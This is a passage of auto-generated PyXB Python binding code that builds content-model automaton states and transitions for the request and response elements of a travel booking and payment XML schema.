counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12))
counters.add(cc_33)
cc_34 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12))
counters.add(cc_34)
cc_35 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12))
counters.add(cc_35)
cc_36 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12))
counters.add(cc_36)
cc_37 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12))
counters.add(cc_37)
cc_38 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12))
counters.add(cc_38)
cc_39 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12))
counters.add(cc_39)
cc_40 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 73, 12))
counters.add(cc_40)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'addPaymentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'addPaymentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12))
st_8 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12))
st_9 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12))
st_10 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12))
st_11 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12))
st_12 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12))
st_13 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12))
st_14 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12))
st_15 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12))
st_16 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12))
st_17 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12))
st_18 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12))
st_19 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12))
st_20 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12))
st_21 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12))
st_22 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12))
st_23 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12))
st_24 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12))
st_25 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12))
st_26 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12))
st_27 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12))
st_28 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12))
st_29 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12))
st_30 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12))
st_31 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12))
st_32 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_33, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12))
st_33 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_34, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12))
st_34 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_35, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12))
st_35 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_36, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12))
st_36 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_37, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12))
st_37 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_37)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_38, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12))
st_38 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_38)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_39, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12))
st_39 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_39)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_40, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 73, 12))
st_40 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_40)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_29, [
